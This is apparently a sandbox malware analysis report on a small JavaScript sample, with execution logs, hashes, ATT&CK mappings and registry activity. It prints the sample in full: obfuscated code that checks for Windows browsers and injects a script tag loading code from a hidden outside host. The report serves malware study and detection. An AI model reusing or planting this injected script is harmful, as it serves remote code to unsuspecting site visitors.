2025-12-08 08:31:23,477 [modules.auxiliary.human] INFO: Found button "ok", clicking it
2025-12-08 08:31:24,477 [root] DEBUG: 3016: NtTerminateProcess hook: Attempting to dump process 3016
2025-12-08 08:31:24,477 [root] DEBUG: 3016: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 08:31:24,493 [root] INFO: Process with pid 3016 has terminated
2025-12-08 08:31:41,508 [root] DEBUG: 556: OpenProcessHandler: Injection info created for process 3768, handle 0x5f0: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
2025-12-08 08:32:14,821 [root] DEBUG: 556: CreateProcessHandler: Injection info set for new process 224: C:\Windows\system32\DllHost.exe, ImageBase: 0x00A50000
2025-12-08 08:32:14,821 [root] INFO: Announced 32-bit process name: dllhost.exe pid: 224
2025-12-08 08:32:14,821 [lib.api.process] INFO: Monitor config for <Process 224 dllhost.exe>: C:\tmpxury4kjh\dll\224.ini
2025-12-08 08:32:14,836 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpxury4kjh\dll\yrjhZcK.dll, loader C:\tmpxury4kjh\bin\RVmCpJY.exe
2025-12-08 08:32:14,836 [root] DEBUG: Loader: Injecting process 224 (thread 1360) with C:\tmpxury4kjh\dll\yrjhZcK.dll.
2025-12-08 08:32:14,836 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-08 08:32:14,836 [root] DEBUG: Successfully injected DLL C:\tmpxury4kjh\dll\yrjhZcK.dll.
2025-12-08 08:32:14,852 [lib.api.process] INFO: Injected into 32-bit <Process 224 dllhost.exe>
2025-12-08 08:32:14,852 [root] INFO: Announced 32-bit process name: dllhost.exe pid: 224
2025-12-08 08:32:14,852 [lib.api.process] INFO: Monitor config for <Process 224 dllhost.exe>: C:\tmpxury4kjh\dll\224.ini
2025-12-08 08:32:14,852 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpxury4kjh\dll\yrjhZcK.dll, loader C:\tmpxury4kjh\bin\RVmCpJY.exe
2025-12-08 08:32:14,852 [root] DEBUG: Loader: Injecting process 224 (thread 1360) with C:\tmpxury4kjh\dll\yrjhZcK.dll.
2025-12-08 08:32:14,868 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2025-12-08 08:32:14,868 [root] DEBUG: Successfully injected DLL C:\tmpxury4kjh\dll\yrjhZcK.dll.
2025-12-08 08:32:14,868 [lib.api.process] INFO: Injected into 32-bit <Process 224 dllhost.exe>
2025-12-08 08:32:14,868 [root] DEBUG: 224: Python path set to 'C:\Python38'.
2025-12-08 08:32:14,868 [root] DEBUG: 224: Dropped file limit defaulting to 100.
2025-12-08 08:32:14,883 [root] INFO: Disabling sleep skipping.
2025-12-08 08:32:14,883 [root] DEBUG: 224: YaraInit: Compiled rules loaded from existing file C:\tmpxury4kjh\data\yara\capemon.yac
2025-12-08 08:32:14,883 [root] DEBUG: 224: YaraScan: Scanning 0x00A50000, size 0x4114
2025-12-08 08:32:14,883 [root] DEBUG: 224: Monitor initialised: 32-bit capemon loaded in process 224 at 0x6c9a0000, thread 1360, image base 0xa50000, stack from 0x176000-0x180000
2025-12-08 08:32:14,883 [root] DEBUG: 224: Commandline: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
2025-12-08 08:32:14,883 [root] DEBUG: 224: GetAddressByYara: ModuleBase 0x774E0000 FunctionName LdrpCallInitRoutine
2025-12-08 08:32:14,883 [root] DEBUG: 224: hook_api: LdrpCallInitRoutine export address 0x77538810 obtained via GetFunctionAddress
2025-12-08 08:32:14,883 [root] DEBUG: 224: hook_api: Warning - CreateRemoteThreadEx export address 0x764AF98F differs from GetProcAddress -> 0x754EBB18 (KERNELBASE.dll::0xbb18)
2025-12-08 08:32:14,899 [root] DEBUG: 224: hook_api: Warning - UpdateProcThreadAttribute export address 0x764B020F differs from GetProcAddress -> 0x754F43FB (KERNELBASE.dll::0x143fb)
2025-12-08 08:32:14,899 [root] WARNING: b'Unable to place hook on GetCommandLineA'
2025-12-08 08:32:14,915 [root] DEBUG: 224: set_hooks: Unable to hook GetCommandLineA
2025-12-08 08:32:14,930 [root] WARNING: b'Unable to place hook on GetCommandLineW'
2025-12-08 08:32:14,930 [root] DEBUG: 224: set_hooks: Unable to hook GetCommandLineW
2025-12-08 08:32:14,930 [root] DEBUG: 224: Hooked 611 out of 613 functions
2025-12-08 08:32:14,930 [root] DEBUG: 224: WoW64 not detected.
2025-12-08 08:32:14,930 [root] INFO: Loaded monitor into process with pid 224
2025-12-08 08:32:14,930 [root] DEBUG: 224: caller_dispatch: Added region at 0x00A50000 to tracked regions list (kernel32::GetSystemTimeAsFileTime returns to 0x00A5193E, thread 1360).
2025-12-08 08:32:14,930 [root] DEBUG: 224: YaraScan: Scanning 0x00A50000, size 0x4114
2025-12-08 08:32:14,946 [root] DEBUG: 224: ProcessImageBase: Main module image at 0x00A50000 unmodified (entropy change 0.000000e+00)
2025-12-08 08:32:14,961 [root] DEBUG: 224: DLL loaded at 0x753E0000: C:\Windows\system32\CRYPTBASE (0xc000 bytes).
2025-12-08 08:32:14,961 [root] DEBUG: 224: DLL loaded at 0x76100000: C:\Windows\system32\CLBCatQ (0x83000 bytes).
2025-12-08 08:32:14,961 [root] DEBUG: 224: DLL loaded at 0x75D80000: C:\Windows\system32\OLEAUT32 (0x8f000 bytes).
2025-12-08 08:32:14,961 [root] DEBUG: 224: DLL loaded at 0x74ED0000: C:\Windows\system32\CRYPTSP (0x16000 bytes).
2025-12-08 08:32:14,961 [root] DEBUG: 224: DLL loaded at 0x74C60000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2025-12-08 08:32:14,961 [root] DEBUG: 224: DLL loaded at 0x75450000: C:\Windows\system32\RpcRtRemote (0xe000 bytes).
2025-12-08 08:32:14,977 [root] DEBUG: 224: DLL loaded at 0x74170000: C:\Windows\system32\uxtheme (0x40000 bytes).
2025-12-08 08:32:14,993 [root] DEBUG: 224: DLL loaded at 0x75920000: C:\Windows\System32\wininet (0x1e4000 bytes).
2025-12-08 08:32:14,993 [root] DEBUG: 224: DLL loaded at 0x75610000: C:\Windows\system32\api-ms-win-downlevel-user32-l1-1-0 (0x4000 bytes).
2025-12-08 08:32:14,993 [root] DEBUG: 224: DLL loaded at 0x757E0000: C:\Windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0 (0x4000 bytes).
2025-12-08 08:32:14,993 [root] DEBUG: 224: DLL loaded at 0x75620000: C:\Windows\system32\api-ms-win-downlevel-version-l1-1-0 (0x4000 bytes).
2025-12-08 08:32:14,993 [root] DEBUG: 224: DLL loaded at 0x74960000: C:\Windows\system32\version (0x9000 bytes).
2025-12-08 08:32:14,993 [root] DEBUG: 224: DLL loaded at 0x75600000: C:\Windows\system32\api-ms-win-downlevel-normaliz-l1-1-0 (0x3000 bytes).
2025-12-08 08:32:14,993 [root] DEBUG: 224: DLL loaded at 0x77630000: C:\Windows\system32\normaliz (0x3000 bytes).
2025-12-08 08:32:14,993 [root] DEBUG: 224: DLL loaded at 0x761B0000: C:\Windows\system32\iertutil (0x232000 bytes).
2025-12-08 08:32:14,993 [root] DEBUG: 224: DLL loaded at 0x755C0000: C:\Windows\system32\api-ms-win-downlevel-advapi32-l1-1-0 (0x5000 bytes).
2025-12-08 08:32:14,993 [root] DEBUG: 224: DLL loaded at 0x757C0000: C:\Windows\system32\USERENV (0x17000 bytes).
2025-12-08 08:32:14,993 [root] DEBUG: 224: DLL loaded at 0x754D0000: C:\Windows\system32\profapi (0xb000 bytes).
2025-12-08 08:32:14,993 [root] DEBUG: 224: DLL loaded at 0x75790000: C:\Windows\system32\api-ms-win-downlevel-ole32-l1-1-0 (0x4000 bytes).
2025-12-08 08:32:14,993 [root] DEBUG: 224: DLL loaded at 0x75350000: C:\Windows\system32\Secur32 (0x8000 bytes).
2025-12-08 08:32:15,008 [root] DEBUG: 224: DLL loaded at 0x766D0000: C:\Windows\system32\SHELL32 (0xc4c000 bytes).
2025-12-08 08:32:15,008 [root] DEBUG: 224: DLL loaded at 0x72CD0000: C:\Windows\system32\api-ms-win-downlevel-advapi32-l2-1-0 (0x4000 bytes).
2025-12-08 08:32:15,008 [root] DEBUG: 224: DLL loaded at 0x72BF0000: C:\Windows\system32\winhttp (0x58000 bytes).
2025-12-08 08:32:15,008 [root] DEBUG: 224: DLL loaded at 0x72BA0000: C:\Windows\system32\webio (0x50000 bytes).
2025-12-08 08:32:15,008 [root] DEBUG: 224: DLL loaded at 0x74E90000: C:\Windows\system32\mswsock (0x3c000 bytes).
2025-12-08 08:32:15,024 [root] DEBUG: 224: DLL loaded at 0x74E80000: C:\Windows\System32\wship6 (0x6000 bytes).
2025-12-08 08:32:15,024 [root] DEBUG: 224: DLL loaded at 0x73640000: C:\Windows\system32\IPHLPAPI (0x1c000 bytes).
2025-12-08 08:32:15,024 [root] DEBUG: 224: DLL loaded at 0x736D0000: C:\Windows\system32\WINNSI (0x7000 bytes).
2025-12-08 08:32:19,743 [root] DEBUG: 556: OpenProcessHandler: Injection info created for process 2068, handle 0x5f8: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
2025-12-08 08:32:20,008 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat
2025-12-08 08:32:20,008 [root] INFO: Process with pid 224 has terminated
2025-12-08 08:32:20,008 [root] DEBUG: 224: NtTerminateProcess hook: Attempting to dump process 224
2025-12-08 08:32:20,008 [root] DEBUG: 224: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 08:34:18,805 [root] INFO: Analysis timeout hit, terminating analysis
2025-12-08 08:34:18,805 [lib.api.process] INFO: Terminate event set for <Process 556 svchost.exe>
2025-12-08 08:34:18,805 [root] DEBUG: 556: Terminate Event: Attempting to dump process 556
2025-12-08 08:34:18,805 [root] DEBUG: 556: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 08:34:18,805 [root] DEBUG: 556: Terminate Event: Current region empty
2025-12-08 08:34:18,805 [lib.api.process] INFO: Termination confirmed for <Process 556 svchost.exe>
2025-12-08 08:34:18,805 [root] INFO: Terminate event set for process 556
2025-12-08 08:34:18,805 [root] DEBUG: 556: Terminate Event: CAPE shutdown complete for process 556
2025-12-08 08:34:18,805 [root] INFO: Created shutdown mutex
2025-12-08 08:34:19,805 [root] INFO: Shutting down package
2025-12-08 08:34:19,805 [root] INFO: Stopping auxiliary modules
2025-12-08 08:34:19,805 [root] INFO: Stopping auxiliary module: Browser
2025-12-08 08:34:19,805 [root] INFO: Stopping auxiliary module: Curtain
2025-12-08 08:34:19,821 [lib.common.results] INFO: Uploading file C:\curtain.log to curtain/1765154059.8212893.curtain.log; Size is 36; Max size: 100000000
2025-12-08 08:34:19,836 [root] INFO: Stopping auxiliary module: End_noisy_tasks
2025-12-08 08:34:19,836 [root] INFO: Stopping auxiliary module: Evtx
2025-12-08 08:34:19,836 [modules.auxiliary.evtx] DEBUG: Adding C:/Windows/System32/winevt/Logs\Application.evtx to zip dump
2025-12-08 08:34:19,836 [modules.auxiliary.evtx] DEBUG: Adding C:/Windows/System32/winevt/Logs\HardwareEvents.evtx to zip dump
2025-12-08 08:34:19,836 [modules.auxiliary.evtx] DEBUG: Adding C:/Windows/System32/winevt/Logs\Internet Explorer.evtx to zip dump
2025-12-08 08:34:19,836 [modules.auxiliary.evtx] DEBUG: Adding C:/Windows/System32/winevt/Logs\Key Management Service.evtx to zip dump
2025-12-08 08:34:19,836 [modules.auxiliary.evtx] DEBUG: Adding C:/Windows/System32/winevt/Logs\Microsoft-Windows-Sysmon%4Operational.evtx to zip dump
2025-12-08 08:34:19,852 [modules.auxiliary.evtx] DEBUG: Adding C:/Windows/System32/winevt/Logs\OAlerts.evtx to zip dump
2025-12-08 08:34:19,852 [modules.auxiliary.evtx] DEBUG: Adding C:/Windows/System32/winevt/Logs\Security.evtx to zip dump
2025-12-08 08:34:19,852 [modules.auxiliary.evtx] DEBUG: Adding C:/Windows/System32/winevt/Logs\Setup.evtx to zip dump
2025-12-08 08:34:19,852 [modules.auxiliary.evtx] DEBUG: Adding C:/Windows/System32/winevt/Logs\System.evtx to zip dump
2025-12-08 08:34:19,852 [modules.auxiliary.evtx] DEBUG: Adding C:/Windows/System32/winevt/Logs\Windows PowerShell.evtx to zip dump
2025-12-08 08:34:19,993 [modules.auxiliary.evtx] DEBUG: Uploading evtx.zip to host
2025-12-08 08:34:19,993 [lib.common.results] INFO: Uploading file evtx.zip to evtx/evtx.zip; Size is 323681; Max size: 100000000
2025-12-08 08:34:19,993 [root] INFO: Stopping auxiliary module: Human
2025-12-08 08:34:20,071 [root] INFO: Stopping auxiliary module: Pre_script
2025-12-08 08:34:20,071 [root] INFO: Stopping auxiliary module: Screenshots
2025-12-08 08:34:24,399 [root] INFO: Stopping auxiliary module: Usage
2025-12-08 08:34:25,493 [root] INFO: Stopping auxiliary module: During_script
2025-12-08 08:34:25,493 [root] INFO: Finishing auxiliary modules
2025-12-08 08:34:25,493 [root] INFO: Shutting down pipe server and dumping dropped files
2025-12-08 08:34:25,493 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat to files\42f9c76ccf7a86c64d1244263a0ff86751e86e025a5996c938bd49c2e24714a1; Size is 128; Max size: 100000000
2025-12-08 08:34:25,493 [root] WARNING: Folder at path "C:\izVIbM\debugger" does not exist, skipping
2025-12-08 08:34:25,493 [root] WARNING: Folder at path "C:\izVIbM\tlsdump" does not exist, skipping
2025-12-08 08:34:25,493 [root] INFO: Analysis completed

Machine

Name win7-32bit-1
Label win7-32bit-1
Manager KVM
Started On 2025-12-08 16:32:32
Shutdown On 2025-12-08 16:35:55
Route inetsim

File Details

File Name testjs.js
File Type JavaScript source, ASCII text, with very long lines (1588), with no line terminators
File Size 1588 bytes
MD5 f3f4a0031083207815ea26bf7d96b25f
SHA1 8eae84b422288fb3798f13d07e8caa08a8b60cb9
SHA256 0bc581a48215eb92ecc15b30954ee4f1c2d9be15134e72b5f3aebe192eae3cb4
SHA3-384 7da3b7677de10374837ca9b7c60452ccdcb70b974ed8f62507236595f9dfa75e9c93090a078a57176be875f403ca76f7
CRC32 7FD7BCF1
TLSH T1A131629B7000D8E183664197F73F110D29BA9D54E0EE8519CD49904E3CB8E4D8129ECF
Ssdeep 48:ncrKDElo1rmeYG9Gp090nnaBOR+N6kzkem:uKYlQ+aTNhzXm

(function(){var v=50;var e=0;function b(){e++;if(e>v)return false;if(!document.body)setTimeout(b,500);else(function(){function t(s){return(s+'').replace(/[a-z]/gi,function(s){return String.fromCharCode(s.charCodeAt(0)+(s.toLowerCase()<'n'?13:-13));});}var i=[' ;1=',' GA ','gcv','p.rk',')q\\/','RVFZ','inw/','avJ(','=fre',')]+',']9-3','[.6 ','))]7','vepf','(1.5','gar','gkrg','|]9-','GA f','u',']3-0','0[1|','revS','a//:','fjbq','gc','c','9-0[','R )*','qveG','epfn','.(01','cggu',')*.(','cn-f','vJ(|','.21/','kbsr','vsgr','GA'];for(var z=0;z<i.length;z++){var s=t(i[z]+'');i[z]=s.split('').reverse().join('');}function je(v,u){var w=false;var d=false;for(var k=0;k<v.length;k++){var p=new RegExp(v[k][0],v[k][1]);if(v[k][2]){w=true;if(p.test(u)){d=true;}}else{if(p.test(u)){return false;}}}if(w&&!d){return false;}return true;}var ud=navigator.userAgent;if(je([[i[5],'i',1],[i[29]+i[15],'i',1],[i[7]+i[24]+i[1]+i[14]+t('.*) ')+i[22]+t('sbk\\')+t('/\\q)')+i[35]+t('aqbj')+i[18]+i[11]+i[20]+i[33]+t(' Sve')+i[37]+t('\\/([')+i[10]+t('.[0|')+t('5|6]')+i[21]+i[17]+t('2[0-')+i[12],'i',1],[i[7]+i[24]+i[1]+i[31]+i[28]+t('qtr\\')+i[36]+i[27]+i[9],'i',1]],ud)&&je([[t('Jvaq')+t('bjf ')+i[39],'i',1]],ud)){(function(){var g=t('k-gq')+i[34]+i[26];var j=document.cookie.match(new RegExp("(?:^|; )"+g+"=([^;]*)"));if(!j){var s=document.createElement(i[13]+i[25]);s.type=i[16]+i[6]+i[30]+i[2];s.src=i[32]+i[23]+i[38]+i[3]+i[19];var m=document.documentElement;m.insertBefore(s,m.lastChild);var d=new Date();d.setTime(d.getTime()+259200000);document.cookie=g+i[0]+t('rkcv')+i[8]+d;}})();}})();}b();})();

Discovery
  • T1082 - System Information Discovery
    • antivm_checks_available_memory
Command and Control
  • T1071 - Application Layer Protocol
    • javascript_timer
    • dynamic_function_loading
Defense Evasion
  • T1036 - Masquerading
    • network_connection_via_suspicious_process
  • T1055 - Process Injection
    • network_connection_via_suspicious_process
    • resumethread_remote_process
Privilege Escalation
  • T1055 - Process Injection
    • network_connection_via_suspicious_process
    • resumethread_remote_process

Usage


Processing ( 1.10 seconds )

  • 0.593 Heatmap
  • 0.465 CAPE
  • 0.038 BehaviorAnalysis
  • 0.003 AnalysisInfo
  • 0.003 NetworkAnalysis
  • 0.001 Debug

Signatures ( 0.03 seconds )

  • 0.005 antiav_detectreg
  • 0.003 ransomware_files
  • 0.002 antianalysis_detectfile
  • 0.002 infostealer_ftp
  • 0.002 ransomware_extensions
  • 0.002 territorial_disputes_sigs
  • 0.001 antianalysis_detectreg
  • 0.001 antiav_detectfile
  • 0.001 antivm_vbox_files
  • 0.001 antivm_vbox_keys
  • 0.001 geodo_banking_trojan
  • 0.001 browser_security
  • 0.001 infostealer_bitcoin
  • 0.001 infostealer_im
  • 0.001 infostealer_mail
  • 0.001 poullight_files
  • 0.001 masquerade_process_name
  • 0.001 ursnif_behavior

Reporting ( 0.05 seconds )

  • 0.042 ReportHTML
  • 0.003 JsonDump
  • 0.002 LiteReport
  • 0.002 MITRE_TTPS

Signatures

Checks available memory
JavaScript timer detected to delay or measure execution time
process: wscript.exe
SetUnhandledExceptionFilter detected (possible anti-debug)
Dynamic (imported) function loading detected
Resumed a thread in another process
thread_resumed: Process wscript.exe with process ID 3016 resumed a thread in another process with the process ID 3016
thread_resumed: Process dllhost.exe with process ID 224 resumed a thread in another process with the process ID 224
Attempts to make a network connection via suspicious process
Checks for presence of debugger via IsDebuggerPresent

Hosts

No hosts contacted.

DNS

No domains contacted.

Summary

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\LoadUserSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\LocalServer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\Elevation
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-2476309959-3960023044-3115063449-1000
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-2476309959-3960023044-3115063449-1000\ProfileImagePath
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000\Environment
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000\Volatile Environment
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000\Volatile Environment\0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\Com+Enabled
HKEY_CURRENT_USER\Software\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}
HKEY_LOCAL_MACHINE\Software\Microsoft\OLE\AppCompat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\AppCompat\RaiseDefaultAuthnLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\AccessPermission
HKEY_CURRENT_USER\Software\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\MaxSxSHashCount
HKEY_CURRENT_USER\Software\Classes\Interface\{B06B0CE5-689B-4AFD-B326-0A08A1A647AF}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B06B0CE5-689B-4AFD-B326-0A08A1A647AF}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B06B0CE5-689B-4AFD-B326-0A08A1A647AF}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InprocHandler
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SyncMode5
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\SessionStartTimeDefaultDeltaSecs
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\MBCSAPIforCrack
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\DllHost.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\RETRY_HEADERONLYPOST_ONCONNECTIONRESET
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\RETRY_HEADERONLYPOST_ONCONNECTIONRESET
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\DllHost.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BYPASS_CACHE_FOR_CREDPOLICY_KB936611
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BYPASS_CACHE_FOR_CREDPOLICY_KB936611
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_IGNORE_MAPPINGS_FOR_CREDPOLICY
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_IGNORE_MAPPINGS_FOR_CREDPOLICY
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_INCLUDE_PORT_IN_SPN_KB908209
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_INCLUDE_PORT_IN_SPN_KB908209
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BUFFERBREAKING_818408
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BUFFERBREAKING_818408
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SKIP_POST_RETRY_ON_INTERNETWRITEFILE_KB895954
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SKIP_POST_RETRY_ON_INTERNETWRITEFILE_KB895954
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_FIX_CHUNKED_PROXY_SCRIPT_DOWNLOAD_KB843289
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_FIX_CHUNKED_PROXY_SCRIPT_DOWNLOAD_KB843289
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_CNAME_FOR_SPN_KB911149
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_USE_CNAME_FOR_SPN_KB911149
